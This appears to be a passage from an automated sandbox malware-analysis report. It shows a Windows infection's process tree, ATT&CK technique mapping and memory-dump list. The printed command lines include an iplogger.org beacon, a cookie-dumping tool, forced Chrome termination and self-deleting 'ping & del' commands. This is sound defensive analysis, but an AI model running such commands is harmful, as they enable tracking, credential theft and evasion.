        Executes dropped EXE
        Checks whether UAC is enabled
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Modifies system certificate store
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1120
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
        7⤵
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe
        
        C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe 0011 installp1
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks whether UAC is enabled
        Writes to the Master Boot Record (MBR)
        Suspicious use of SetThreadContext
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:2416
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3244
        
        C:\Users\Admin\AppData\Roaming\1605712587875.exe
        
        "C:\Users\Admin\AppData\Roaming\1605712587875.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605712587875.txt"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1864
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:648
        
        C:\Users\Admin\AppData\Roaming\1605712592235.exe
        
        "C:\Users\Admin\AppData\Roaming\1605712592235.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605712592235.txt"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2444
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2964
        
        C:\Users\Admin\AppData\Roaming\1605712597672.exe
        
        "C:\Users\Admin\AppData\Roaming\1605712597672.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605712597672.txt"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:616
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1048
        
        C:\Users\Admin\AppData\Roaming\1605712600360.exe
        
        "C:\Users\Admin\AppData\Roaming\1605712600360.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605712600360.txt"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
        
        C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
        
        "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Writes to the Master Boot Record (MBR)
        Suspicious use of SetWindowsHookEx
        
        PID:3824
        
        C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe
        
        C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe /silent
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1444
        
        C:\Users\Admin\AppData\Local\Temp\is-GKG9L.tmp\1021C014A4C9A552.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-GKG9L.tmp\1021C014A4C9A552.tmp" /SL5="$8005C,761193,121344,C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe" /silent
        9⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:2672
        
        C:\Program Files (x86)\RearRips\seed.sfx.exe
        
        "C:\Program Files (x86)\RearRips\seed.sfx.exe" -pK2j8l614 -s1
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2724
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c "start https://iplogger.org/14Ahe7"
        10⤵
        
        PID:3984
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe"
        8⤵
        
        PID:1516
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        9⤵
        Runs ping.exe
        
        PID:1600
        
        C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe
        
        C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe 200 installp1
        7⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Writes to the Master Boot Record (MBR)
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:204
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        8⤵
        
        PID:3756
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        9⤵
        Kills process with taskkill
        
        PID:1404
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe"
        8⤵
        
        PID:3324
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        9⤵
        Runs ping.exe
        
        PID:2108
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"
        7⤵
        
        PID:1560
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        8⤵
        Runs ping.exe
        
        PID:2380
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of AdjustPrivilegeToken
      PID:2104
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1032
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2928
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:824
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:3356
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        
        PID:3224
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:816

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:3368
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 4BEE831CF17A398554ED20EEEE4EB308 C
  2⤵
  - Loads dropped DLL
  PID:3136

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Bootkit

T1067

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/204-100-0x0000000072A80000-0x0000000072B13000-memory.dmp

Filesize
588KB

Download
memory/204-109-0x00000000039E0000-0x0000000003E91000-memory.dmp

Filesize
4.7MB

Download
memory/616-137-0x0000000072A80000-0x0000000072B13000-memory.dmp

Filesize
588KB

Download
memory/648-125-0x00007FFF434A0000-0x00007FFF4351E000-memory.dmp

Filesize
504KB

Download
memory/1048-140-0x00007FFF434A0000-0x00007FFF4351E000-memory.dmp

Filesize
504KB

Download
memory/1120-68-0x0000000072A80000-0x0000000072B13000-memory.dmp

Filesize
588KB

Download
memory/1120-72-0x0000000010000000-0x000000001033D000-memory.dmp

Filesize
3.2MB

Download
memory/1176-64-0x0000000072A80000-0x0000000072B13000-memory.dmp

Filesize
588KB

Download
memory/1444-174-0x0000000072A80000-0x0000000072B13000-memory.dmp

Filesize
588KB

Download
memory/1536-40-0x0000000010000000-0x00000000100E3000-memory.dmp

Filesize
908KB

Download
memory/1864-119-0x0000000072A80000-0x0000000072B13000-memory.dmp

Filesize
588KB

Download
memory/2416-98-0x0000000072A80000-0x0000000072B13000-memory.dmp

Filesize
588KB

Download
memory/2416-110-0x0000000003980000-0x0000000003E31000-memory.dmp

Filesize
4.7MB

Download
memory/2416-152-0x00000000064C0000-0x00000000064C1000-memory.dmp

Filesize
4KB

Download
memory/2444-129-0x0000000072A80000-0x0000000072B13000-memory.dmp

Filesize
588KB

Download
memory/2524-145-0x0000000072A80000-0x0000000072B13000-memory.dmp

Filesize
588KB

Download
memory/2608-150-0x0000000072A80000-0x0000000072B13000-memory.dmp

Filesize
588KB

Download
memory/2672-178-0x0000000072A80000-0x0000000072B13000-memory.dmp

Filesize
588KB

Download
memory/2724-185-0x0000000072A80000-0x0000000072B13000-memory.dmp

Filesize
588KB

Download
memory/2964-132-0x00007FFF434A0000-0x00007FFF4351E000-memory.dmp

Filesize
504KB

Download
memory/3092-53-0x0000000072A80000-0x0000000072B13000-memory.dmp

Filesize
588KB

Download
memory/3092-58-0x0000000010B20000-0x0000000010B21000-memory.dmp

Filesize
4KB

Download
memory/3092-60-0x0000000010B40000-0x0000000010B41000-memory.dmp

Filesize
4KB

Download
memory/3092-55-0x00000000717B0000-0x0000000071E9E000-memory.dmp

Filesize
6.9MB

Download
memory/3244-112-0x00007FFF434A0000-0x00007FFF4351E000-memory.dmp

Filesize
504KB

Download
memory/3244-114-0x0000000010000000-0x0000000010057000-memory.dmp

Filesize
348KB

Download
memory/3824-157-0x0000000072A80000-0x0000000072B13000-memory.dmp

Filesize
588KB

Download